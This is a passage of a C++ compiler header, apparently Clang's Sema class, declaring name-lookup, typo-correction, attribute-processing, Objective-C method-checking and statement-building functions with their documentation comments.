/// Look up an ordinary name that is going to be redeclared as a
/// name with linkage. This lookup ignores any declarations that
/// are outside of the current scope unless they have linkage. See
/// C99 6.2.2p4-5 and C++ [basic.link]p6.
LookupRedeclarationWithLinkage,
/// Look up a friend of a local class. This lookup does not look
/// outside the innermost non-class scope. See C++11 [class.friend]p11.
LookupLocalFriendName,
/// Look up the name of an Objective-C protocol.
LookupObjCProtocolName,
/// Look up implicit 'self' parameter of an objective-c method.
LookupObjCImplicitSelfParam,
/// Look up the name of an OpenMP user-defined reduction operation.
LookupOMPReductionName,
/// Look up the name of an OpenMP user-defined mapper.
LookupOMPMapperName,
/// Look up any declaration with any name.
LookupAnyName
};
/// Specifies whether (or how) name lookup is being performed for a
/// redeclaration (vs. a reference).
enum RedeclarationKind {
/// The lookup is a reference to this name that is not for the
/// purpose of redeclaring the name.
NotForRedeclaration = 0,
/// The lookup results will be used for redeclaration of a name,
/// if an entity by that name already exists and is visible.
ForVisibleRedeclaration,
/// The lookup results will be used for redeclaration of a name
/// with external linkage; non-visible lookup results with external linkage
/// may also be found.
ForExternalRedeclaration
};
RedeclarationKind forRedeclarationInCurContext() {
// A declaration with an owning module for linkage can never link against
// anything that is not visible. We don't need to check linkage here; if
// the context has internal linkage, redeclaration lookup won't find things
// from other TUs, and we can't safely compute linkage yet in general.
if (cast<Decl>(CurContext)
->getOwningModuleForLinkage(/*IgnoreLinkage*/true))
return ForVisibleRedeclaration;
return ForExternalRedeclaration;
}
/// The possible outcomes of name lookup for a literal operator.
enum LiteralOperatorLookupResult {
/// The lookup resulted in an error.
LOLR_Error,
/// The lookup found no match but no diagnostic was issued.
LOLR_ErrorNoDiagnostic,
/// The lookup found a single 'cooked' literal operator, which
/// expects a normal literal to be built and passed to it.
LOLR_Cooked,
/// The lookup found a single 'raw' literal operator, which expects
/// a string literal containing the spelling of the literal token.
LOLR_Raw,
/// The lookup found an overload set of literal operator templates,
/// which expect the characters of the spelling of the literal token to be
/// passed as a non-type template argument pack.
LOLR_Template,
/// The lookup found an overload set of literal operator templates,
/// which expect the character type and characters of the spelling of the
/// string literal token to be passed as template arguments.
LOLR_StringTemplate
};
SpecialMemberOverloadResult LookupSpecialMember(CXXRecordDecl *D,
CXXSpecialMember SM,
bool ConstArg,
bool VolatileArg,
bool RValueThis,
bool ConstThis,
bool VolatileThis);
typedef std::function<void(const TypoCorrection &)> TypoDiagnosticGenerator;
typedef std::function<ExprResult(Sema &, TypoExpr *, TypoCorrection)>
TypoRecoveryCallback;
private:
bool CppLookupName(LookupResult &R, Scope *S);
struct TypoExprState {
std::unique_ptr<TypoCorrectionConsumer> Consumer;
TypoDiagnosticGenerator DiagHandler;
TypoRecoveryCallback RecoveryHandler;
TypoExprState();
TypoExprState(TypoExprState &&other) noexcept;
TypoExprState &operator=(TypoExprState &&other) noexcept;
};
/// The set of unhandled TypoExprs and their associated state.
llvm::MapVector<TypoExpr *, TypoExprState> DelayedTypos;
/// Creates a new TypoExpr AST node.
TypoExpr *createDelayedTypo(std::unique_ptr<TypoCorrectionConsumer> TCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC);
// The set of known/encountered (unique, canonicalized) NamespaceDecls.
//
// The boolean value will be true to indicate that the namespace was loaded
// from an AST/PCH file, or false otherwise.
llvm::MapVector<NamespaceDecl*, bool> KnownNamespaces;
/// Whether we have already loaded known namespaces from an extenal
/// source.
bool LoadedExternalKnownNamespaces;
/// Helper for CorrectTypo and CorrectTypoDelayed used to create and
/// populate a new TypoCorrectionConsumer. Returns nullptr if typo correction
/// should be skipped entirely.
std::unique_ptr<TypoCorrectionConsumer>
makeTypoCorrectionConsumer(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
DeclContext *MemberContext, bool EnteringContext,
const ObjCObjectPointerType *OPT,
bool ErrorRecovery);
public:
const TypoExprState &getTypoExprState(TypoExpr *TE) const;
/// Clears the state of the given TypoExpr.
void clearDelayedTypo(TypoExpr *TE);
/// Look up a name, looking for a single declaration. Return
/// null if the results were absent, ambiguous, or overloaded.
///
/// It is preferable to use the elaborated form and explicitly handle
/// ambiguity and overloaded.
NamedDecl *LookupSingleName(Scope *S, DeclarationName Name,
SourceLocation Loc,
LookupNameKind NameKind,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupBuiltin(LookupResult &R);
bool LookupName(LookupResult &R, Scope *S,
bool AllowBuiltinCreation = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
bool InUnqualifiedLookup = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
CXXScopeSpec &SS);
bool LookupParsedName(LookupResult &R, Scope *S, CXXScopeSpec *SS,
bool AllowBuiltinCreation = false,
bool EnteringContext = false);
ObjCProtocolDecl *LookupProtocol(IdentifierInfo *II, SourceLocation IdLoc,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupInSuper(LookupResult &R, CXXRecordDecl *Class);
void LookupOverloadedOperatorName(OverloadedOperatorKind Op, Scope *S,
QualType T1, QualType T2,
UnresolvedSetImpl &Functions);
LabelDecl *LookupOrCreateLabel(IdentifierInfo *II, SourceLocation IdentLoc,
SourceLocation GnuLabelLoc = SourceLocation());
DeclContextLookupResult LookupConstructors(CXXRecordDecl *Class);
CXXConstructorDecl *LookupDefaultConstructor(CXXRecordDecl *Class);
CXXConstructorDecl *LookupCopyingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupCopyingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXConstructorDecl *LookupMovingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupMovingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXDestructorDecl *LookupDestructor(CXXRecordDecl *Class);
bool checkLiteralOperatorId(const CXXScopeSpec &SS, const UnqualifiedId &Id);
LiteralOperatorLookupResult LookupLiteralOperator(Scope *S, LookupResult &R,
ArrayRef<QualType> ArgTys,
bool AllowRaw,
bool AllowTemplate,
bool AllowStringTemplate,
bool DiagnoseMissing);
bool isKnownName(StringRef name);
/// Status of the function emission on the CUDA/HIP/OpenMP host/device attrs.
enum class FunctionEmissionStatus {
Emitted,
CUDADiscarded, // Discarded due to CUDA/HIP hostness
OMPDiscarded, // Discarded due to OpenMP hostness
TemplateDiscarded, // Discarded due to uninstantiated templates
Unknown,
};
FunctionEmissionStatus getEmissionStatus(FunctionDecl *Decl);
// Whether the callee should be ignored in CUDA/HIP/OpenMP host/device check.
bool shouldIgnoreInHostDeviceCheck(FunctionDecl *Callee);
void ArgumentDependentLookup(DeclarationName Name, SourceLocation Loc,
ArrayRef<Expr *> Args, ADLResult &Functions);
void LookupVisibleDecls(Scope *S, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool LoadExternal = true);
void LookupVisibleDecls(DeclContext *Ctx, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool IncludeDependentBases = false,
bool LoadExternal = true);
enum CorrectTypoKind {
CTK_NonError, // CorrectTypo used in a non error recovery situation.
CTK_ErrorRecovery // CorrectTypo used in normal error recovery.
};
TypoCorrection CorrectTypo(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind,
Scope *S, CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr,
bool RecordFailure = true);
TypoExpr *CorrectTypoDelayed(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC, CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr);
/// Process any TypoExprs in the given Expr and its children,
/// generating diagnostics as appropriate and returning a new Expr if there
/// were typos that were all successfully corrected and ExprError if one or
/// more typos could not be corrected.
///
/// \param E The Expr to check for TypoExprs.
///
/// \param InitDecl A VarDecl to avoid because the Expr being corrected is its
/// initializer.
///
/// \param Filter A function applied to a newly rebuilt Expr to determine if
/// it is an acceptable/usable result from a single combination of typo
/// corrections. As long as the filter returns ExprError, different
/// combinations of corrections will be tried until all are exhausted.
ExprResult
CorrectDelayedTyposInExpr(Expr *E, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; });
ExprResult
CorrectDelayedTyposInExpr(Expr *E,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(E, nullptr, Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; }) {
return ER.isInvalid() ? ER : CorrectDelayedTyposInExpr(ER.get(), Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(ER, nullptr, Filter);
}
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
bool ErrorRecovery = true);
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
const PartialDiagnostic &PrevNote,
bool ErrorRecovery = true);
void MarkTypoCorrectedFunctionDefinition(const NamedDecl *F);
void FindAssociatedClassesAndNamespaces(SourceLocation InstantiationLoc,
ArrayRef<Expr *> Args,
AssociatedNamespaceSet &AssociatedNamespaces,
AssociatedClassSet &AssociatedClasses);
void FilterLookupForScope(LookupResult &R, DeclContext *Ctx, Scope *S,
bool ConsiderLinkage, bool AllowInlineNamespace);
bool CheckRedeclarationModuleOwnership(NamedDecl *New, NamedDecl *Old);
void DiagnoseAmbiguousLookup(LookupResult &Result);
//@}
ObjCInterfaceDecl *getObjCInterfaceDecl(IdentifierInfo *&Id,
SourceLocation IdLoc,
bool TypoCorrection = false);
NamedDecl *LazilyCreateBuiltin(IdentifierInfo *II, unsigned ID,
Scope *S, bool ForRedeclaration,
SourceLocation Loc);
NamedDecl *ImplicitlyDefineFunction(SourceLocation Loc, IdentifierInfo &II,
Scope *S);
void AddKnownFunctionAttributes(FunctionDecl *FD);
// More parsing and symbol table subroutines.
void ProcessPragmaWeak(Scope *S, Decl *D);
// Decl attributes - this routine is the top level dispatcher.
void ProcessDeclAttributes(Scope *S, Decl *D, const Declarator &PD);
// Helper for delayed processing of attributes.
void ProcessDeclAttributeDelayed(Decl *D,
const ParsedAttributesView &AttrList);
void ProcessDeclAttributeList(Scope *S, Decl *D, const ParsedAttributesView &AL,
bool IncludeCXX11Attributes = true);
bool ProcessAccessDeclAttributeList(AccessSpecDecl *ASDecl,
const ParsedAttributesView &AttrList);
void checkUnusedDeclAttributes(Declarator &D);
/// Map any API notes provided for this declaration to attributes on the
/// declaration.
///
/// Triggered by declaration-attribute processing.
void ProcessAPINotes(Decl *D);
/// Determine if type T is a valid subject for a nonnull and similar
/// attributes. By default, we look through references (the behavior used by
/// nonnull), but if the second parameter is true, then we treat a reference
/// type as valid.
bool isValidPointerAttrType(QualType T, bool RefOkay = false);
bool CheckRegparmAttr(const ParsedAttr &attr, unsigned &value);
bool CheckCallingConvAttr(const ParsedAttr &attr, CallingConv &CC,
const FunctionDecl *FD = nullptr);
bool CheckAttrTarget(const ParsedAttr &CurrAttr);
bool CheckAttrNoArgs(const ParsedAttr &CurrAttr);
bool checkStringLiteralArgumentAttr(const ParsedAttr &Attr, unsigned ArgNum,
StringRef &Str,
SourceLocation *ArgLocation = nullptr);
bool checkSectionName(SourceLocation LiteralLoc, StringRef Str);
bool checkTargetAttr(SourceLocation LiteralLoc, StringRef Str);
bool checkMSInheritanceAttrOnDefinition(
CXXRecordDecl *RD, SourceRange Range, bool BestCase,
MSInheritanceModel SemanticSpelling);
void CheckAlignasUnderalignment(Decl *D);
/// Adjust the calling convention of a method to be the ABI default if it
/// wasn't specified explicitly. This handles method types formed from
/// function type typedefs and typename template arguments.
void adjustMemberFunctionCC(QualType &T, bool IsStatic, bool IsCtorOrDtor,
SourceLocation Loc);
// Check if there is an explicit attribute, but only look through parens.
// The intent is to look for an attribute on the current declarator, but not
// one that came from a typedef.
bool hasExplicitCallingConv(QualType T);
/// Get the outermost AttributedType node that sets a calling convention.
/// Valid types should not have multiple attributes with different CCs.
const AttributedType *getCallingConvAttributedType(QualType T) const;
/// Check whether a nullability type specifier can be added to the given
/// type through some means not written in source (e.g. API notes).
///
/// \param type The type to which the nullability specifier will be
/// added. On success, this type will be updated appropriately.
///
/// \param nullability The nullability specifier to add.
///
/// \param diagLoc The location to use for diagnostics.
///
/// \param allowArrayTypes Whether to accept nullability specifiers on an
/// array type (e.g., because it will decay to a pointer).
///
/// \param overrideExisting Whether to override an existing, locally-specified
/// nullability specifier rather than complaining about the conflict.
///
/// \returns true if nullability cannot be applied, false otherwise.
bool checkImplicitNullabilityTypeSpecifier(QualType &type,
NullabilityKind nullability,
SourceLocation diagLoc,
bool allowArrayTypes,
bool overrideExisting);
/// Stmt attributes - this routine is the top level dispatcher.
StmtResult ProcessStmtAttributes(Stmt *Stmt,
const ParsedAttributesView &Attrs,
SourceRange Range);
void WarnConflictingTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
void CheckConflictingOverridingMethod(ObjCMethodDecl *Method,
ObjCMethodDecl *Overridden,
bool IsProtocolMethodDecl);
/// WarnExactTypedMethods - This routine issues a warning if method
/// implementation declaration matches exactly that of its declaration.
void WarnExactTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
typedef llvm::SmallPtrSet<Selector, 8> SelectorSet;
/// CheckImplementationIvars - This routine checks if the instance variables
/// listed in the implelementation match those listed in the interface.
void CheckImplementationIvars(ObjCImplementationDecl *ImpDecl,
ObjCIvarDecl **Fields, unsigned nIvars,
SourceLocation Loc);
/// ImplMethodsVsClassMethods - This is main routine to warn if any method
/// remains unimplemented in the class or category \@implementation.
void ImplMethodsVsClassMethods(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool IncompleteImpl = false);
/// DiagnoseUnimplementedProperties - This routine warns on those properties
/// which must be implemented by this implementation.
void DiagnoseUnimplementedProperties(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl *CDecl,
bool SynthesizeProperties);
/// Diagnose any null-resettable synthesized setters.
void diagnoseNullResettableSynthesizedSetters(const ObjCImplDecl *impDecl);
/// DefaultSynthesizeProperties - This routine default synthesizes all
/// properties which must be synthesized in the class's \@implementation.
void DefaultSynthesizeProperties(Scope *S, ObjCImplDecl *IMPDecl,
ObjCInterfaceDecl *IDecl,
SourceLocation AtEnd);
void DefaultSynthesizeProperties(Scope *S, Decl *D, SourceLocation AtEnd);
/// IvarBacksCurrentMethodAccessor - This routine returns 'true' if 'IV' is
/// an ivar synthesized for 'Method' and 'Method' is a property accessor
/// declared in class 'IFace'.
bool IvarBacksCurrentMethodAccessor(ObjCInterfaceDecl *IFace,
ObjCMethodDecl *Method, ObjCIvarDecl *IV);
/// DiagnoseUnusedBackingIvarInAccessor - Issue an 'unused' warning if ivar which
/// backs the property is not used in the property's accessor.
void DiagnoseUnusedBackingIvarInAccessor(Scope *S,
const ObjCImplementationDecl *ImplD);
/// GetIvarBackingPropertyAccessor - If method is a property setter/getter and
/// it property has a backing ivar, returns this ivar; otherwise, returns NULL.
/// It also returns ivar's property on success.
ObjCIvarDecl *GetIvarBackingPropertyAccessor(const ObjCMethodDecl *Method,
const ObjCPropertyDecl *&PDecl) const;
/// Called by ActOnProperty to handle \@property declarations in
/// class extensions.
ObjCPropertyDecl *HandlePropertyInClassExtension(Scope *S,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
unsigned &Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind);
/// Called by ActOnProperty and HandlePropertyInClassExtension to
/// handle creating the ObjcPropertyDecl for a category or \@interface.
ObjCPropertyDecl *CreatePropertyDecl(Scope *S,
ObjCContainerDecl *CDecl,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
const unsigned Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
/// AtomicPropertySetterGetterRules - This routine enforces the rule (via
/// warning) when atomic property has one but not the other user-declared
/// setter or getter.
void AtomicPropertySetterGetterRules(ObjCImplDecl* IMPDecl,
ObjCInterfaceDecl* IDecl);
void DiagnoseOwningPropertyGetterSynthesis(const ObjCImplementationDecl *D);
void DiagnoseMissingDesignatedInitOverrides(
const ObjCImplementationDecl *ImplD,
const ObjCInterfaceDecl *IFD);
void DiagnoseDuplicateIvars(ObjCInterfaceDecl *ID, ObjCInterfaceDecl *SID);
enum MethodMatchStrategy {
MMS_loose,
MMS_strict
};
/// MatchTwoMethodDeclarations - Checks if two methods' type match and returns
/// true, or false, accordingly.
bool MatchTwoMethodDeclarations(const ObjCMethodDecl *Method,
const ObjCMethodDecl *PrevMethod,
MethodMatchStrategy strategy = MMS_strict);
/// MatchAllMethodDeclarations - Check methods declaraed in interface or
/// or protocol against those declared in their implementations.
void MatchAllMethodDeclarations(const SelectorSet &InsMap,
const SelectorSet &ClsMap,
SelectorSet &InsMapSeen,
SelectorSet &ClsMapSeen,
ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool &IncompleteImpl,
bool ImmediateClass,
bool WarnCategoryMethodImpl=false);
/// CheckCategoryVsClassMethodMatches - Checks that methods implemented in
/// category matches with those implemented in its primary class and
/// warns each time an exact match is found.
void CheckCategoryVsClassMethodMatches(ObjCCategoryImplDecl *CatIMP);
/// Add the given method to the list of globally-known methods.
void addMethodToGlobalList(ObjCMethodList *List, ObjCMethodDecl *Method);
/// Returns default addr space for method qualifiers.
LangAS getDefaultCXXMethodAddrSpace() const;
private:
/// AddMethodToGlobalPool - Add an instance or factory method to the global
/// pool. See descriptoin of AddInstanceMethodToGlobalPool.
void AddMethodToGlobalPool(ObjCMethodDecl *Method, bool impl, bool instance);
/// LookupMethodInGlobalPool - Returns the instance or factory method and
/// optionally warns if there are multiple signatures.
ObjCMethodDecl *LookupMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass,
bool instance);
public:
/// - Returns instance or factory methods in global method pool for
/// given selector. It checks the desired kind first, if none is found, and
/// parameter checkTheOther is set, it then checks the other kind. If no such
/// method or only one method is found, function returns false; otherwise, it
/// returns true.
bool
CollectMultipleMethodsInGlobalPool(Selector Sel,
SmallVectorImpl<ObjCMethodDecl*>& Methods,
bool InstanceFirst, bool CheckTheOther,
const ObjCObjectType *TypeBound = nullptr);
bool
AreMultipleMethodsInGlobalPool(Selector Sel, ObjCMethodDecl *BestMethod,
SourceRange R, bool receiverIdOrClass,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
void
DiagnoseMultipleMethodInGlobalPool(SmallVectorImpl<ObjCMethodDecl*> &Methods,
Selector Sel, SourceRange R,
bool receiverIdOrClass);
private:
/// - Returns a selector which best matches given argument list or
/// nullptr if none could be found
ObjCMethodDecl *SelectBestMethod(Selector Sel, MultiExprArg Args,
bool IsInstance,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
/// Record the typo correction failure and return an empty correction.
TypoCorrection FailedCorrection(IdentifierInfo *Typo, SourceLocation TypoLoc,
bool RecordFailure = true) {
if (RecordFailure)
TypoCorrectionFailures[Typo].insert(TypoLoc);
return TypoCorrection();
}
public:
/// AddInstanceMethodToGlobalPool - All instance methods in a translation
/// unit are added to a global pool. This allows us to efficiently associate
/// a selector with a method declaraation for purposes of typechecking
/// messages sent to "id" (where the class of the object is unknown).
void AddInstanceMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/true);
}
/// AddFactoryMethodToGlobalPool - Same as above, but for factory methods.
void AddFactoryMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/false);
}
/// AddAnyMethodToGlobalPool - Add any method, instance or factory to global
/// pool.
void AddAnyMethodToGlobalPool(Decl *D);
/// LookupInstanceMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupInstanceMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/true);
}
/// LookupFactoryMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupFactoryMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/false);
}
const ObjCMethodDecl *SelectorsForTypoCorrection(Selector Sel,
QualType ObjectType=QualType());
/// LookupImplementedMethodInGlobalPool - Returns the method which has an
/// implementation.
ObjCMethodDecl *LookupImplementedMethodInGlobalPool(Selector Sel);
/// CollectIvarsToConstructOrDestruct - Collect those ivars which require
/// initialization.
void CollectIvarsToConstructOrDestruct(ObjCInterfaceDecl *OI,
SmallVectorImpl<ObjCIvarDecl*> &Ivars);
//===--------------------------------------------------------------------===//
// Statement Parsing Callbacks: SemaStmt.cpp.
public:
class FullExprArg {
public:
FullExprArg() : E(nullptr) { }
FullExprArg(Sema &actions) : E(nullptr) { }
ExprResult release() {
return E;
}
Expr *get() const { return E; }
Expr *operator->() {
return E;
}
private:
// FIXME: No need to make the entire Sema class a friend when it's just
// Sema::MakeFullExpr that needs access to the constructor below.
friend class Sema;
explicit FullExprArg(Expr *expr) : E(expr) {}
Expr *E;
};
FullExprArg MakeFullExpr(Expr *Arg) {
return MakeFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation());
}
FullExprArg MakeFullExpr(Expr *Arg, SourceLocation CC) {
return FullExprArg(
ActOnFinishFullExpr(Arg, CC, /*DiscardedValue*/ false).get());
}
FullExprArg MakeFullDiscardedValueExpr(Expr *Arg) {
ExprResult FE =
ActOnFinishFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation(),
/*DiscardedValue*/ true);
return FullExprArg(FE.get());
}
StmtResult ActOnExprStmt(ExprResult Arg, bool DiscardedValue = true);
StmtResult ActOnExprStmtError();
StmtResult ActOnNullStmt(SourceLocation SemiLoc,
bool HasLeadingEmptyMacro = false);
void ActOnStartOfCompoundStmt(bool IsStmtExpr);
void ActOnFinishOfCompoundStmt();
StmtResult ActOnCompoundStmt(SourceLocation L, SourceLocation R,
ArrayRef<Stmt *> Elts, bool isStmtExpr);
/// A RAII object to enter scope of a compound statement.
class CompoundScopeRAII {
public:
CompoundScopeRAII(Sema &S, bool IsStmtExpr = false) : S(S) {
S.ActOnStartOfCompoundStmt(IsStmtExpr);
}
~CompoundScopeRAII() {
S.ActOnFinishOfCompoundStmt();
}
private:
Sema &S;
};
/// An RAII helper that pops function a function scope on exit.
struct FunctionScopeRAII {
Sema &S;
bool Active;
FunctionScopeRAII(Sema &S) : S(S), Active(true) {}
~FunctionScopeRAII() {
if (Active)
S.PopFunctionScopeInfo();
}
void disable() { Active = false; }
};
StmtResult ActOnDeclStmt(DeclGroupPtrTy Decl,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ActOnForEachDeclStmt(DeclGroupPtrTy Decl);
StmtResult ActOnForEachLValueExpr(Expr *E);
ExprResult ActOnCaseExpr(SourceLocation CaseLoc, ExprResult Val);
StmtResult ActOnCaseStmt(SourceLocation CaseLoc, ExprResult LHS,
SourceLocation DotDotDotLoc, ExprResult RHS,
SourceLocation ColonLoc);
void ActOnCaseStmtBody(Stmt *CaseStmt, Stmt *SubStmt);
StmtResult ActOnDefaultStmt(SourceLocation DefaultLoc,
SourceLocation ColonLoc,
Stmt *SubStmt, Scope *CurScope);
StmtResult ActOnLabelStmt(SourceLocation IdentLoc, LabelDecl *TheDecl,
SourceLocation ColonLoc, Stmt *SubStmt);
StmtResult ActOnAttributedStmt(SourceLocation AttrLoc,
ArrayRef<const Attr*> Attrs,
Stmt *SubStmt);
class ConditionResult;
StmtResult ActOnIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult BuildIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult ActOnStartOfSwitchStmt(SourceLocation SwitchLoc,
Stmt *InitStmt,
ConditionResult Cond);
StmtResult ActOnFinishSwitchStmt(SourceLocation SwitchLoc,
Stmt *Switch, Stmt *Body);
StmtResult ActOnWhileStmt(SourceLocation WhileLoc, ConditionResult Cond,
Stmt *Body);
StmtResult ActOnDoStmt(SourceLocation DoLoc, Stmt *Body,
SourceLocation WhileLoc, SourceLocation CondLParen,
Expr *Cond, SourceLocation CondRParen);
StmtResult ActOnForStmt(SourceLocation ForLoc,
SourceLocation LParenLoc,
Stmt *First,
ConditionResult Second,
FullExprArg Third,
SourceLocation RParenLoc,
Stmt *Body);
ExprResult CheckObjCForCollectionOperand(SourceLocation forLoc,
Expr *collection);
StmtResult ActOnObjCForCollectionStmt(SourceLocation ForColLoc,
Stmt *First, Expr *collection,
SourceLocation RParenLoc);
StmtResult FinishObjCForCollectionStmt(Stmt *ForCollection, Stmt *Body);
enum BuildForRangeKind {
/// Initial building of a for-range statement.
BFRK_Build,
/// Instantiation or recovery rebuild of a for-range statement. Don't
/// attempt any typo-correction.
BFRK_Rebuild,
/// Determining whether a for-range statement could be built. Avoid any
/// unnecessary or irreversible actions.
BFRK_Check
};
StmtResult ActOnCXXForRangeStmt(Scope *S, SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
Stmt *LoopVar,
SourceLocation ColonLoc, Expr *Collection,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult BuildCXXForRangeStmt(SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
SourceLocation ColonLoc,
Stmt *RangeDecl, Stmt *Begin, Stmt *End,
Expr *Cond, Expr *Inc,
Stmt *LoopVarDecl,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult FinishCXXForRangeStmt(Stmt *ForRange, Stmt *Body);
StmtResult ActOnGotoStmt(SourceLocation GotoLoc,
SourceLocation LabelLoc,
LabelDecl *TheDecl);
StmtResult ActOnIndirectGotoStmt(SourceLocation GotoLoc,
SourceLocation StarLoc,
Expr *DestExp);
StmtResult ActOnContinueStmt(SourceLocation ContinueLoc, Scope *CurScope);
StmtResult ActOnBreakStmt(SourceLocation BreakLoc, Scope *CurScope);
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind, unsigned NumParams);
typedef std::pair<StringRef, QualType> CapturedParamNameType;
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind,
ArrayRef<CapturedParamNameType> Params,
unsigned OpenMPCaptureLevel = 0);
StmtResult ActOnCapturedRegionEnd(Stmt *S);
void ActOnCapturedRegionError();
RecordDecl *CreateCapturedStmtRecordDecl(CapturedDecl *&CD,
SourceLocation Loc,
unsigned NumParams);
enum CopyElisionSemanticsKind {
CES_Strict = 0,
CES_AllowParameters = 1,
CES_AllowDifferentTypes = 2,
CES_AllowExceptionVariables = 4,
CES_FormerDefault = (CES_AllowParameters),
CES_Default = (CES_AllowParameters | CES_AllowDifferentTypes),
CES_AsIfByStdMove = (CES_AllowParameters | CES_AllowDifferentTypes |
CES_AllowExceptionVariables),
};
VarDecl *getCopyElisionCandidate(QualType ReturnType, Expr *E,
CopyElisionSemanticsKind CESK);
bool isCopyElisionCandidate(QualType ReturnType, const VarDecl *VD,
CopyElisionSemanticsKind CESK);
StmtResult ActOnReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp,
Scope *CurScope);
StmtResult BuildReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnCapScopeReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnGCCAsmStmt(SourceLocation AsmLoc, bool IsSimple,
bool IsVolatile, unsigned NumOutputs,
unsigned NumInputs, IdentifierInfo **Names,
MultiExprArg Constraints, MultiExprArg Exprs,
Expr *AsmString, MultiExprArg Clobbers,
unsigned NumLabels,
SourceLocation RParenLoc);
void FillInlineAsmIdentifierInfo(Expr *Res,
llvm::InlineAsmIdentifierInfo &Info);
ExprResult LookupInlineAsmIdentifier(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Id,
bool IsUnevaluatedContext);
bool LookupInlineAsmField(StringRef Base, StringRef Member,
unsigned &Offset, SourceLocation AsmLoc);
ExprResult LookupInlineAsmVarDeclField(Expr *RefExpr, StringRef Member,
SourceLocation AsmLoc);
